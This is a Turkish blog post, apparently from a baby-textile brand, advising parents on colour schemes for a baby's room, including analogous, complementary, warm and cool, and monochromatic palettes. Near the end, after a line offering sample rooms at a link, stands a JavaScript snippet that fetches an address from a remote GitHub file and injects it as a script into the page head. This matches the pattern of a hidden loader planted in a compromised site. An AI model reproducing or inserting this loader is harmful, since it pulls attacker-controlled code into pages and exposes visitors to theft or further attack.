;

Bebek odası renkleri, renklerin büyüsü ve anlattıkları

Bebek odası renkleri

Bebek odası renkleri, renklerin büyüsü ve anlattıkları

Bebek odası renkleri, renklerin büyüsü ve anlattıkları

Bebek odası renkleri kararını veremediniz mi? sadece pembe ve mavi dışında da seçebileceğiniz renkler var. Özellikle anlamlarını düşünerek renkleri seçmelisiniz. Peki, renklerin hayatımızdaki anlamı ve etkisi üzerine düşündünüz mü hiç?

Aşkla bakan bir sevgilinin gözlerindeki renk…

Çevresindeki insanların neşesiyle göğe yükselen kamp ateşinin rengi…

Büyük bir sofranın üzerinden coşkuyla tokuşturulan kadehlere yansıyan avize ışığının rengi…

Fırtına sonrası yeni durulmuş denizin kumsala kavuşmak üzere dalgalanırken değiştirdiği o dört, belki beş ayrı mavi tonu…

İlkbaharın canlılığının, sonbaharın melankolisinin rengi…

Bazen “Bu ne renk?” diye hayran hayran baktıran o tonlar, yeşilin içindeki mavi, mavinin içindeki yeşil…

En mutlu anlarımızı ışığın etrafında, renklerin içinde geçiriyoruz. Yüzünü Güneş’e dönen çiçekler gibi biz de ışığa yönelip onun aydınlattığı bir dünyada renkleri görüyor, deneyimlerimizi renklerle çeşitlendiriyoruz. Hayat bizi karanlık yollara sokunca çıkış yolunda yepyeni bir renk bizi bekliyor.

Peki doğru zamanda doğru atmosferi yaratma gücü olan renkler, ışığın da gücünü de yanına alarak bizi hangi alanlarda, nasıl etkiliyor? Yaşam alanımızdaki renkleri, bebek ve çocukların yatak odalarının tonlarını ve onlara özel tekstil ürünlerini seçerken nelere dikkat etmeliyiz?

1.    Doğal, analog renkler

Bebek odası renkleriBebek odası renkleri ve tekstil ürünlerinde birbiriyle uyumlu renkler elde etmek istiyorsanız renk tekerleğinde yan yana gördüğünüz sarı, turuncu, mavi, lacivert ve mor gibi renkleri farklı tonlarda bir arada kullanabilirsiniz. Birbirine benzeyen bu renkler sakinleştirici, tanıdık, ve huzur verici bir etkiye sahiptir. Biz Nite Nite ailesi olarak ürünlerimizde bebeklerin ve çocukların baktıkça içini açacak, kolayca ve huzurla uykuya dalmalarını sağlayacak doğal ve yumuşak renkleri kullanıyoruz.

2.  Tamamlayıcı renkler

Bebek odası renkleriDaha kontrast ve dinamik bir hava için renk çemberindeki turuncu ve mavi, sarı ve mor gibi zıt renkleri bir arada kullanıp tamamlayıcı tonlar elde edebilirsiniz. Kontrast arttıkça konseptinizin enerji seviyesi de yükselecektir. Burada dikkat etmeniz gereken tek şey yarattığınız armoninin dengesidir.

3. Bebek odası renkleri – Üç ve dört renk armonileri

Nite NiteRenk çemberine eşit aralıklarla yerleşmiş üç rengi ya da birbirine düz çizgiler ile bağlanınca bir dörtgen oluşturacak dört rengi kullanarak da bir armoni oluşturmanız mümkün. Burada gerçek bir uyum yakalamak için bir rengi dominant olacak şekilde kullanırken diğerlerine daha az rol vermeniz gerekiyor.

4. Bebek odası renkleri – Sıcak ve soğuk renkler

Nite NiteEğer renk çemberini tam ortadan ikiye bölerseniz bir yarımda sıcak, diğer yarımda ise soğuk renklerin kaldığını göreceksiniz. Seçimleriniz soğuk renklerden yana olursa sakin, huzurlu bir atmosfer; sıcak renklerden yana olursa canlı ve dinamik bir hava yaratabilirsiniz.

5. Monokromatik renkler

Nite NiteMonokromatik renkleri, tek bir rengin açık ve koyu tonları olarak tanımlayabiliriz. Bu renkleri beraber kullanarak sade ve zarif bir uyum elde edebilirsiniz. Eğer tercihiniz monokromatik renklerden yana olacaksa size özellikle mavi, yeşil ve sarı tonlarını öneririz. Ana renginizi, siyah, beyaz, gri gibi nötr renklerle de birleştirebilirsiniz.

Rengarenk günler dileriz!

Renklerin hissettirdiklerini görmek isterseniz. Örnek odalar bu linkte…

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

LEAVE A COMMENT

Your email address will not be published. Required fields are marked *